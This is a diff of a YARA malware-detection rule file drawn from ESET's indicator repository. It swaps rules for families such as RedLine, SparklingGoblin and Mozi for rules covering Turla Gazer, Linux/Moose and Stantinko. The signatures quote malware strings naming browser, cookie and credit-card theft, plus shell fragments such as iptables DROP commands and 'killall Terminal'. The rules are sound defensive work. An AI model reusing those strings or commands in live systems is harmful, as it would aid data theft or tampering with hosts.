-            89 55 ??
-            33 F0
-            41 8B C1
-            41 33 C6
-            C1 C6 08
-            C1 C0 10
-            44 03 DE
-            44 03 E8
-            41 33 DB
-            41 8B CD
-            C1 C3 07
-            41 33 C8
-            44 8B 45 ??
-            C1 C1 0C
-            44 03 C9
-            45 8B F1
-            44 33 F0
-            41 C1 C6 08
-            45 03 EE
-            41 8B C5
-            33 C1
-            8B 4D ??
-            C1 C0 07
-        }
-
-	condition:
-		any of them and filesize < 450KB
-}
-rule ESET_Sparklinggoblin_Etweventwrite
-{
-	meta:
-		description = "SparklingGoblin EtwEventWrite patching"
-		author = "ESET Research"
-		id = "27b36ee1-a98c-5174-a156-8e0b0d0a58cd"
-		date = "2021-05-20"
-		modified = "2021-08-26"
-		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/sparklinggoblin/SparklingGoblin.yar#L370-L463"
-		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
-		hash = "2edbea43f5c40c867e5b6bbd93cc972525df598b"
-		hash = "b6d245d3d49b06645c0578804064ce0c072cbe0f"
-		hash = "8be6d5f040d0085c62b1459afc627707b0de89cf"
-		hash = "4668302969fe122874fb2447a80378dcb671c86b"
-		hash = "9bdecb08e16a23d271d0a3e836d9e7f83d7e2c3b"
-		hash = "9ce7650f2c08c391a35d69956e171932d116b8bd"
-		logic_hash = "45615dcc5302392c18052818071623a9d1a1008c460bdb24a4acfb4300356c6b"
-		score = 75
-		quality = 80
-		tags = ""
-		license = "BSD 2-Clause"
-
-	strings:
-		$chunk_1 = {
-            48 8D 0D ?? ?? ?? ??
-            C7 44 24 ?? 48 31 C0 C3
-            FF 15 ?? ?? ?? ??
-            48 8B C8
-            48 8D 15 ?? ?? ?? ??
-            FF 15 ?? ?? ?? ??
-            83 64 24 ?? 00
-            4C 8D 4C 24 ??
-            BF 04 00 00 00
-            48 8B C8
-            8B D7
-            48 8B D8
-            44 8D 47 ??
-            FF 15 ?? ?? ?? ??
-            44 8B C7
-            48 8D 54 24 ??
-            48 8B CB
-            E8 ?? ?? ?? ??
-            44 8B 44 24 ??
-            4C 8D 4C 24 ??
-            8B D7
-            48 8B CB
-            FF 15 ?? ?? ?? ??
-            48 8B 05 ?? ?? ?? ??
-        }
-		$chunk_2 = {
-            55
-            8B EC
-            51
-            51
-            57
-            68 08 1A 41 00
-            66 C7 45 ?? C2 14
-            C6 45 ?? 00
-            FF 15 ?? ?? ?? ??
-            68 10 1A 41 00
-            50
-            FF 15 ?? ?? ?? ??
-            83 65 ?? 00
-            8B F8
-            8D 45 ??
-            50
-            6A 40
-            6A 03
-            57
-            FF 15 ?? ?? ?? ??
-            6A 03
-            8D 45 ??
-            50
-            57
-            E8 ?? ?? ?? ??
-            83 C4 0C
-            8D 45 ??
-            50
-            FF 75 ??
-            6A 03
-            57
-            FF 15 ?? ?? ?? ??
-        }
-		$chunk_3 = {
-            48 8D 0D ?? ?? ?? ??
-            C7 44 24 ?? 48 31 C0 C3
-            FF 15 ?? ?? ?? ??
-            48 8B C8
-            48 8D 15 ?? ?? ?? ??
-            FF 15 ?? ?? ?? ??
-        }
-
-	condition:
-		any of them
-}
-rule ESET_Sparklinggoblin_Mutex
+rule ESET_Gazer_Certificate_Subject
 {
 	meta:
-		description = "SparklingGoblin ChaCha20 loaders mutexes"
+		description = "Turla Gazer malware"
 		author = "ESET Research"
-		id = "e33d2bc1-29d6-5117-8e0f-31f8bced0979"
-		date = "2021-05-20"
-		modified = "2021-08-26"
+		id = "a7719333-b341-538c-a8ed-5c50b653a765"
+		date = "2017-08-30"
+		modified = "2017-08-29"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/sparklinggoblin/SparklingGoblin.yar#L465-L489"
-		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
-		hash = "2edbea43f5c40c867e5b6bbd93cc972525df598b"
-		hash = "b6d245d3d49b06645c0578804064ce0c072cbe0f"
-		hash = "8be6d5f040d0085c62b1459afc627707b0de89cf"
-		hash = "4668302969fe122874fb2447a80378dcb671c86b"
-		hash = "9bdecb08e16a23d271d0a3e836d9e7f83d7e2c3b"
-		hash = "9ce7650f2c08c391a35d69956e171932d116b8bd"
-		logic_hash = "00fbd514c8e2d6dea3b0f175e857a613e158b64caf1f970e814d62f1ebe9d35c"
-		score = 75
-		quality = 80
-		tags = ""
-		license = "BSD 2-Clause"
-
-	strings:
-		$mutex_1 = "kREwdFrOlvASgP4zWZyV89m6T2K0bIno"
-		$mutex_2 = "v5EPQFOImpTLaGZes3Nl1JSKHku8AyCw"
-
-	condition:
-		any of them
-}
-
-rule ESET_Richheaders_Lazarus_Nukesped_Iconicpayloads_3CX_Q12023
-{
-	meta:
-		description = "Rich Headers-based rule covering the IconicLoader and IconicStealer from the 3CX supply chain incident, and also payloads from the cryptocurrency campaigns from 2022-12"
-		author = "ESET Research"
-		id = "5c815d14-8a3e-5c6a-9dc3-988e0f31c094"
-		date = "2023-03-31"
-		modified = "2023-04-19"
-		reference = "https://github.com/eset/malware-ioc"
-		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/nukesped_lazarus/rich_headers_IconicPayloads_3CX.yar#L6-L23"
+		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/turla/gazer.yar#L33-L46"
 		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
-		hash = "3b88cda62cdd918b62ef5aa8c5a73a46f176d18b"
-		hash = "cad1120d91b812acafef7175f949dd1b09c6c21a"
-		hash = "5b03294b72c0caa5fb20e7817002c600645eb475"
-		hash = "7491bd61ed15298ce5ee5ffd01c8c82a2cdb40ec"
-		logic_hash = "f11a1db798bfcc534982bdf6afaae154b095b6a1e0896e75e2791c01e51a1c16"
+		logic_hash = "6e870c9cdcee33769162de62ea143ff401af50b22a63d2f212c44d06f5771dec"
 		score = 75
 		quality = 80
 		tags = ""
-
-	condition:
-		pe.rich_signature.toolid( 259 , 30818 ) == 9 and pe.rich_signature.toolid ( 256 , 31329 ) == 1 and pe.rich_signature.toolid ( 261 , 30818 ) >= 30 and pe.rich_signature.toolid ( 261 , 30818 ) <= 38 and pe.rich_signature.toolid ( 261 , 29395 ) >= 134 and pe.rich_signature.toolid ( 261 , 29395 ) <= 164 and pe.rich_signature.toolid ( 257 , 29395 ) >= 6 and pe.rich_signature.toolid ( 257 , 29395 ) <= 14
-}
-rule ESET_Cw_Windows_Redline_Panel_Tab_Headers : FILE
-{
-	meta:
-		description = "Matches view headers in Redline Panel"
-		author = "ESET Research"
-		id = "44a95845-b0a3-59c1-8188-86d415eff0bf"
-		date = "2022-10-11"
-		modified = "2024-11-12"
-		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/redline/redline.yar#L32-L55"
-		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
-		hash = "a154dfaedc237c047f419eb6884dab1ef4e2a17d"
-		logic_hash = "3198aa9df2814a5f1d5568c6eed5f3189b2f72b3928cc97645f9bf57eebab9ac"
-		score = 75
-		quality = 80
-		tags = "FILE"
-		license = "BSD 2-Clause"
-		version = 2
-
-	strings:
-		$ = "RedLine | Log In"
-		$ = "RedLine | Autofilles Viewer"
-		$ = "RedLine | Choose Browser"
-		$ = "RedLine | Cookie Viewer"
-		$ = "RedLine | Credit Card Viewer"
-		$ = "RedLine | Files Viewer"
-		$ = "RedLine | Log saver"
-		$ = "RedLine | System Info Viewer"
-
-	condition:
-		uint16( 0 ) == 0x5A4D and 6 of them
-}
-rule ESET_Cw_Windows_Redline_Panel_Distinctive_Strings : FILE
-{
-	meta:
-		description = "Matches rare strings found in Redline panel"
-		author = "ESET Research"
-		id = "d40ccb6b-e777-5c05-b97c-ead910047649"
-		date = "2022-10-11"
-		modified = "2024-11-12"
-		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/redline/redline.yar#L57-L77"
-		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
-		hash = "a154dfaedc237c047f419eb6884dab1ef4e2a17d"
-		logic_hash = "7ff0239426c4c3b46a269fad71232295c038c09f276cdc3c7f1142c830260a6d"
-		score = 75
-		quality = 80
-		tags = "FILE"
-		license = "BSD 2-Clause"
-		version = 2
-
-	strings:
-		$env_var = "%DSK_23%"
-		$fn_name = "IsGratherThan"
-		$telegram0 = "Telegram: @REDLINESUPPORT"
-		$telegram1 = "https://t.me/REDLINESUPPORT"
-
-	condition:
-		uint16( 0 ) == 0x5A4D and any of them
-}
-rule ESET_Cw_Windows_Redline_Panel_Prompts : FILE
-{
-	meta:
-		description = "Matches prompt messages in Redline panel"
-		author = "ESET Research"
-		id = "3481586b-ed4b-5a27-82a0-0bbb3eea279e"
-		date = "2022-10-11"
-		modified = "2024-11-12"
-		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/redline/redline.yar#L79-L113"
-		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
-		hash = "a154dfaedc237c047f419eb6884dab1ef4e2a17d"
-		logic_hash = "0dfab05a9383ba13b3c610f1ab0c81e95804470002f27171ab39706f7723983a"
-		score = 75
-		quality = 80
-		tags = "FILE"
+		contact = "github@eset.com"
 		license = "BSD 2-Clause"
-		version = 2
-
-	strings:
-		$ = "Choose directory to save log"
-		$ = "Select log to set comment"
-		$ = "Please enter an action to create new task"
-		$ = "Please enter a target to create new task"
-		$ = "Please enter a final point to create new task"
-		$ = "Please enter a correct action to create new task"
-		$ = "Please enter a correct final point to create new task"
-		$ = "Please enter an action to edit task"
-		$ = "Please enter a target to edit task"
-		$ = "Please enter a final point to edit task"
-		$ = "Please enter a correct action to edit task"
-		$ = "Please enter a correct final point to edit task"
-		$ = "Please enter a correct status to edit task"
-		$ = "Please, enter a domains"
-		$ = "Please, enter a valid server ip"
-		$ = "Choose a file to pump"
-		$ = "Enter a valid count of bytes"
-		$ = "Enter a valid count of bytes. Must be more then zero"
-		$ = "Disconnected. Reboot your panel"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 10 of them
+		for any i in ( 0 .. pe.number_of_signatures - 1 ) : ( pe.signatures [ i ] . subject contains "Solid Loop" or pe.signatures [ i ] . subject contains "Ultimate Computer Support" )
 }
-rule ESET_Cw_Windows_Redline_Panel_Status_Message_Strings : FILE
+rule ESET_Gazer_Certificate : FILE
 {
 	meta:
-		description = "Matches error/success messages in Redline panel"
+		description = "Turla Gazer malware"
 		author = "ESET Research"
-		id = "70bdff10-9c86-57e3-b839-e86173a44855"
-		date = "2022-10-11"
-		modified = "2024-11-12"
+		id = "e90bbe53-4e7f-59c4-a505-4893150bf824"
+		date = "2017-08-30"
+		modified = "2017-08-29"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/redline/redline.yar#L115-L142"
+		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/turla/gazer.yar#L48-L65"
 		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
-		hash = "a154dfaedc237c047f419eb6884dab1ef4e2a17d"
-		logic_hash = "c60fabc81967b083be72ff564af744ab60441de5d563ea6d88d873c0a99bfbdd"
+		logic_hash = "eb3afbaefd23d4fc6ded494d3378dc910a0832b160e733ab79c590128dd74cea"
 		score = 75
 		quality = 80
 		tags = "FILE"
+		contact = "github@eset.com"
 		license = "BSD 2-Clause"
-		version = 1
 
 	strings:
-		$ = "All Browsers are empty"
-		$ = "Client [{0}:{1}:{2}] completed task with {3} ID."
-		$ = "A List of logs cleared"
-		$ = "Browsers not found"
-		$ = "Browsers is empty"
-		$ = "Done. Check your build file"
-		$ = "You must to enable assembly info or certificate in settings"
-		$ = "Duplicate log from "
-		$ = "Password list is empty"
-		$ = "Cookie list is empty"
-		$ = "FTPs not found"
-		$ = "Files not found"
+		$certif1 = {52 76 a4 53 cd 70 9c 18 da 65 15 7e 5f 1f de 02}
+		$certif2 = {12 90 f2 41 d9 b2 80 af 77 fc da 12 c6 b4 96 9c}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 8 of them
+		( uint16( 0 ) == 0x5a4d ) and 1 of them and filesize < 2MB
 }
-rule ESET_Cw_Windows_Redline_Panel_Commands : FILE
+rule ESET_Gazer_Logfile_Name : FILE
 {
 	meta:
-		description = "Matches commands and functionalities in Redline panel"
+		description = "Turla Gazer malware"
 		author = "ESET Research"
-		id = "b479dc47-53a0-5ead-a4c3-bcdfcaf82ef8"
-		date = "2022-10-11"
-		modified = "2024-11-12"
+		id = "3e1454e9-dddf-5197-b486-b96d725fdb58"
+		date = "2017-08-30"
+		modified = "2017-08-29"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/redline/redline.yar#L144-L172"
+		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/turla/gazer.yar#L67-L85"
 		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
-		hash = "a154dfaedc237c047f419eb6884dab1ef4e2a17d"
-		logic_hash = "724516101264aa89259e847e4703d4eb993f330f82bd2df2433176b11d0c8974"
+		logic_hash = "b50553f4b4b07f124e5bd390e7dc8ac6b60a8ef185f3bc227894f957d6483478"
 		score = 75
-		quality = 55
+		quality = 80
 		tags = "FILE"
+		contact = "github@eset.com"
 		license = "BSD 2-Clause"
-		version = 2
 
 	strings:
-		$cmd0 = "Download"
-		$cmd1 = "RunPE"
-		$cmd2 = "DownloadAndEx"
-		$cmd3 = "OpenLink"
-		$cmd4 = "Cmd"
-		$action0 = "GrabBrowsers"
-		$action1 = "GrabFiles"
-		$action2 = "GrabImClients"
-		$action3 = "AntiDuplicate"
-		$action4 = "grabBrowsers"
-		$action5 = "grabFiles"
-		$action6 = "grabImClients"
-		$action7 = "antiDuplicate"
+		$s1 = "CVRG72B5.tmp.cvr"
+		$s2 = "CVRG1A6B.tmp.cvr"
+		$s3 = "CVRG38D9.tmp.cvr"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of ( $cmd* ) and 4 of ( $action* )
+		( uint16( 0 ) == 0x5a4d ) and 1 of them
 }
 rule ESET_Apt_Windows_TA410_Tendyron_Dropper
 {
@@ -70563,7 +70615,7 @@ rule ESET_Apt_Windows_TA410_Flowcloud_Header_Decryption : FILE
 		description = "Matches the function used to decrypt resources headers in TA410 FlowCloud"
 		author = "ESET Research"
 		id = "403c1845-bc25-5a49-8553-8a0be18d6970"
-		date = "2025-01-08"
+		date = "2025-01-15"
 		modified = "2022-04-27"
 		reference = "https://github.com/eset/malware-ioc/"
 		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/ta410/ta410.yar#L417-L496"
@@ -70882,455 +70934,963 @@ rule ESET_Apt_Windows_TA410_Flowcloud_V4_Resources : FILE
 	condition:
 		uint16( 0 ) == 0x5a4d and pe.number_of_resources >= 6 and for 5 resource in pe.resources : ( resource.type == 10 and resource.language == 1033 and ( resource.name_string == "1\x000\x000\x000\x000\x00" or resource.name_string == "1\x000\x000\x000\x001\x00" or resource.name_string == "1\x000\x000\x000\x002\x00" or resource.name_string == "1\x000\x000\x000\x003\x00" or resource.name_string == "1\x000\x000\x000\x004\x00" or resource.name_string == "1\x000\x000\x000\x005\x00" or resource.name_string == "1\x000\x001\x000\x000\x00" ) )
 }
-rule ESET_Mumblehard_Packer
+rule ESET_Moose_1
 {
 	meta:
-		description = "Mumblehard i386 assembly code responsible for decrypting Perl code"
-		author = "Marc-Etienne M.Léveillé"
-		id = "981c18e3-ac28-54f5-97ab-44b1d12a1389"
-		date = "2015-04-07"
-		modified = "2015-05-01"
-		reference = "http://www.welivesecurity.com"
-		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/mumblehard/mumblehard_packer.yar#L32-L47"
+		description = "No description has been set in the source file - ESET"
+		author = "ESET TI"
+		id = "4d228de6-ddbf-57c0-a330-5840c4d40dfc"
+		date = "2015-04-21"
+		modified = "2016-11-01"
+		reference = "https://github.com/eset/malware-ioc/"
+		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/moose/linux-moose.yar#L41-L76"
 		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
-		logic_hash = "a04f50a7054c4ce8ad9be4e7f3373ad4f36eb9443e223601974e852c25603f5f"
+		logic_hash = "8bedac80a1f754ce56294ba9786b62a002aacd074f756724401efc61def127e6"
+		score = 75
+		quality = 30
+		tags = ""
+		Author = "Thomas Dupuy"
+		Description = "Linux/Moose malware"
+		Contact = "github@eset.com"
+		License = "BSD 2-Clause"
+
+	strings:
+		$s0 = "Status: OK"
+		$s1 = "--scrypt"
+		$s2 = "stratum+tcp://"
+		$s3 = "cmd.so"
+		$s4 = "/Challenge"
+		$s7 = "processor"
+		$s9 = "cpu model"
+		$s21 = "password is wrong"
+		$s22 = "password:"
+		$s23 = "uthentication failed"
+		$s24 = "sh"
+		$s25 = "ps"
+		$s26 = "echo -n -e "
+		$s27 = "chmod"
+		$s28 = "elan2"
+		$s29 = "elan3"
+		$s30 = "chmod: not found"
+		$s31 = "cat /proc/cpuinfo"
+		$s32 = "/proc/%s/cmdline"
+		$s33 = "kill %s"
+
+	condition:
+		ESET_Is_Elf_PRIVATE and all of them
+}
+rule ESET_Moose_2
+{
+	meta:
+		description = "No description has been set in the source file - ESET"
+		author = "ESET TI"
+		id = "74372984-dace-5665-a5d0-39b8d1002fa1"
+		date = "2016-10-02"
+		modified = "2016-11-01"
+		reference = "http://www.welivesecurity.com/2016/11/02/linuxmoose-still-breathing/"
+		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/moose/linux-moose.yar#L78-L110"
+		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
+		logic_hash = "3f50d2d81d4c27e44d93804adcf93971017767ed0e020447cdb343931c2fbc43"
 		score = 75
 		quality = 80
 		tags = ""
-		version = "1"
+		Author = "Thomas Dupuy"
+		Description = "Linux/Moose malware active since September 2015"
+		Contact = "github@eset.com"
+		License = "BSD 2-Clause"
 
 	strings:
-		$decrypt = { 31 db  [1-10]  ba ?? 00 00 00  [0-6]  (56 5f |  89 F7)
-                     39 d3 75 13 81 fa ?? 00 00 00 75 02 31 d2 81 c2 ?? 00 00
-                     00 31 db 43 ac 30 d8 aa 43 e2 e2 }
+		$s1 = "Modules are loaded"
+		$s2 = "--scrypt"
+		$s3 = "http://"
+		$s4 = "https://"
+		$s5 = "processor "
+		$s6 = "cpu model "
+		$s7 = "Host: www.challpok.cn"
+		$s8 = "Cookie: PHPSESSID=%s; nhash=%s; chash=%s"
+		$s9 = "fail!"
+		$s10 = "H3lL0WoRlD"
+		$s11 = "crondd"
+		$s12 = "cat /proc/cpuinfo"
+		$s13 = "Set-Cookie: PHPSESSID="
+		$s14 = "Set-Cookie: LP="
+		$s15 = "Set-Cookie: WL="
+		$s16 = "Set-Cookie: CP="
+		$s17 = "Loading modules..."
+		$s18 = "-nobg"
 
 	condition:
-		$decrypt
+		ESET_Is_Elf_PRIVATE and 5 of them
 }
-rule ESET_Mozi_Killswitch : FILE
+
+rule ESET_Beds_Plugin
 {
 	meta:
-		description = "Mozi botnet kill switch"
-		author = "Ivan Besina"
-		id = "e3d34ae0-de06-5ff4-b44b-44d264b6dd29"
-		date = "2023-09-29"
-		modified = "2023-10-31"
+		description = "No description has been set in the source file - ESET"
+		author = "ESET TI"
+		id = "7c038e92-1064-503e-9d63-2d2c10f1759e"
+		date = "2017-07-17"
+		modified = "2017-07-20"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/mozi/mozi.yar#L32-L51"
+		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/stantinko/stantinko.yar#L34-L51"
 		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
-		logic_hash = "90eaed2f7f5595b145b2678a46ef6179082192215369fa9235024b0ce1574a49"
+		logic_hash = "024cb91288f133e4cdf5993ac0477de6de76d38fa06f7affa348c6a28a4600da"
+		score = 75
+		quality = 80
+		tags = ""
+		Author = "Frédéric Vachon"
+		Description = "Stantinko BEDS' plugins"
+		Contact = "github@eset.com"
+		License = "BSD 2-Clause"
+
+	condition:
+		pe.exports( "CheckDLLStatus" ) and pe.exports ( "GetPluginData" ) and pe.exports ( "InitializePlugin" ) and pe.exports ( "IsReleased" ) and pe.exports ( "ReleaseDLL" )
+}
+
+rule ESET_Beds_Dropper
+{
+	meta:
+		description = "No description has been set in the source file - ESET"
+		author = "ESET TI"
+		id = "47ccab59-253f-55d4-b38a-4441802626fc"
+		date = "2017-07-17"
+		modified = "2017-07-20"
+		reference = "https://github.com/eset/malware-ioc/"
+		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/stantinko/stantinko.yar#L53-L67"
+		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
+		logic_hash = "4b5d121e182e3fddd766a7a1227c5de273995e9336156e7a6e8a17faad681bea"
 		score = 75
 		quality = 80
+		tags = ""
+		Author = "Frédéric Vachon"
+		Description = "BEDS dropper"
+		Contact = "github@eset.com"
+		License = "BSD 2-Clause"
+
+	condition:
+		pe.imphash( ) == "a7ead4ef90d9981e25728e824a1ba3ef"
+}
+rule ESET_Facebook_Bot : FILE
+{
+	meta:
+		description = "No description has been set in the source file - ESET"
+		author = "ESET TI"
+		id = "643b137f-af79-584c-8266-f2335a79f1ba"
+		date = "2017-07-17"
+		modified = "2017-07-20"
+		reference = "https://github.com/eset/malware-ioc/"
+		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/stantinko/stantinko.yar#L69-L100"
+		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
+		logic_hash = "8ea779f90fa6080398403e3e6f9d342360c35e93c756ed43cb699f090106504e"
+		score = 75
+		quality = 55
 		tags = "FILE"
-		license = "BSD 2-Clause"
-		version = "1"
+		Author = "Frédéric Vachon"
+		Description = "Stantinko's Facebook bot"
+		Contact = "github@eset.com"
+		License = "BSD 2-Clause"
 
 	strings:
-		$iptables1 = "iptables -I INPUT  -p tcp --destination-port 7547 -j DROP"
-		$iptables2 = "iptables -I OUTPUT -p tcp --sport 30005 -j DROP"
-		$haha = "/haha"
-		$networks = "/usr/networks"
+		$s1 = "m_upload_pic&return_uri=https%3A%2F%2Fm.facebook.com%2Fprofile.php" fullword ascii
+		$s2 = "D:\\work\\brut\\cms\\facebook\\facebookbot\\Release\\facebookbot.pdb" fullword ascii
+		$s3 = "https%3A%2F%2Fm.facebook.com%2Fcomment%2Freplies%2F%3Fctoken%3D" fullword ascii
+		$s4 = "reg_fb_gate=https%3A%2F%2Fm.facebook.com%2Freg" fullword ascii
+		$s5 = "reg_fb_ref=https%3A%2F%2Fm.facebook.com%2Freg%2F" fullword ascii
+		$s6 = "&return_uri_error=https%3A%2F%2Fm.facebook.com%2Fprofile.php" fullword ascii
+		$x1 = "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36" fullword ascii
+		$x2 = "registration@facebookmail.com" fullword ascii
+		$x3 = "https://m.facebook.com/profile.php?mds=" fullword ascii
+		$x4 = "https://upload.facebook.com/_mupload_/composer/?profile&domain=" fullword ascii
+		$x5 = "http://staticxx.facebook.com/connect/xd_arbiter.php?version=42#cb=ff43b202c" fullword ascii
+		$x6 = "https://upload.facebook.com/_mupload_/photo/x/saveunpublished/" fullword ascii
+		$x7 = "m.facebook.com&ref=m_upload_pic&waterfall_source=" fullword ascii
+		$x8 = "payload.commentID" fullword ascii
+		$x9 = "profile.login" fullword ascii
 
 	condition:
-		all of them and filesize < 500KB
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $s* ) or 3 of ( $x* ) ) ) or ( all of them )
 }
-rule ESET_Potao
+rule ESET_Pds_Plugins : FILE
 {
 	meta:
 		description = "No description has been set in the source file - ESET"
 		author = "ESET TI"
-		id = "9c755cb8-9e3f-5118-a8e0-4ded9a075cbd"
-		date = "2015-07-29"
-		modified = "2015-07-30"
+		id = "dfa75db5-f21c-5b5e-84ba-3bfdcc3efdcd"
+		date = "2017-07-17"
+		modified = "2017-07-20"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/potao/PotaoNew.yara#L96-L108"
+		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/stantinko/stantinko.yar#L102-L130"
 		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
-		logic_hash = "c68addb14f7c22cec0c4d58bfffd373b2e3eb5c53a5b65532c84574e073fcbba"
+		logic_hash = "26bbd380b72fb45206178639d67c8737b9984b140ba1048432949e159946c847"
 		score = 75
 		quality = 80
-		tags = ""
-		Author = "Anton Cherepanov"
-		Description = "Operation Potao"
-		Contact = "threatintel@eset.com"
+		tags = "FILE"
+		Author = "Frédéric Vachon"
+		Description = "Stantinko PDS' plugins"
+		Contact = "github@eset.com"
 		License = "BSD 2-Clause"
 
+	strings:
+		$s1 = "std::_Vector_val<CHTTPPostItem *,std::allocator<CHTTPPostItem *> >" fullword ascii
+		$s2 = "std::_Vector_val<CHTTPHeader *,std::allocator<CHTTPHeader *> >" fullword ascii
+		$s3 = "std::vector<CHTTPHeader *,std::allocator<CHTTPHeader *> >" fullword ascii
+		$s4 = "std::vector<CHTTPPostItem *,std::allocator<CHTTPPostItem *> >" fullword ascii
+		$s5 = "CHTTPHeaderManager" fullword ascii
+		$s6 = "CHTTPPostItemManager *" fullword ascii
+		$s7 = "CHTTPHeaderManager *" fullword ascii
+		$s8 = "CHTTPPostItemManager" fullword ascii
+		$s9 = "CHTTPHeader" fullword ascii
+		$s10 = "CHTTPPostItem" fullword ascii
+		$s11 = "std::vector<CCookie *,std::allocator<CCookie *> >" fullword ascii
+		$s12 = "std::_Vector_val<CCookie *,std::allocator<CCookie *> >" fullword ascii
+		$s13 = "CCookieManager *" fullword ascii
+
 	condition:
-		ESET_Potaodecoy_PRIVATE or ESET_Potaodll_PRIVATE or ESET_Potaousb_PRIVATE or ESET_Potaosecondstage_PRIVATE
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 2 of ( $s* ) ) )
 }
-rule ESET_Keydnap_Downloader
+rule ESET_Stantinko_Pdb
 {
 	meta:
-		description = "OSX/Keydnap Downloader"
-		author = "Marc-Etienne M.Léveillé"
-		id = "2b21007a-b143-5538-8777-ba35448d00aa"
-		date = "2016-07-06"
-		modified = "2016-07-06"
-		reference = "http://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-is-hungry-for-credentials"
-		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/keydnap/keydnap.yar#L33-L49"
+		description = "No description has been set in the source file - ESET"
+		author = "ESET TI"
+		id = "24694e53-b89e-5cd3-ad53-e738bbd7d69d"
+		date = "2017-07-17"
+		modified = "2017-07-20"
+		reference = "https://github.com/eset/malware-ioc/"
+		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/stantinko/stantinko.yar#L132-L148"
 		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
-		logic_hash = "71c8885193a92fa9c71055c37e629a54d50070cf6820b9216a824ecc4db2ce3c"
+		logic_hash = "902c0ee086ce1a8def831d2f30c868165198c6c304faac3a93116a524f8e2fbf"
 		score = 75
 		quality = 80
 		tags = ""
-		version = "1"
+		Author = "Frédéric Vachon"
+		Description = "Stantinko malware family PDB path"
+		Contact = "github@eset.com"
+		License = "BSD 2-Clause"
 
 	strings:
-		$ = "icloudsyncd"
-		$ = "killall Terminal"
-		$ = "open %s"
+		$s1 = "D:\\work\\service\\service\\" ascii
 
 	condition:
-		2 of them
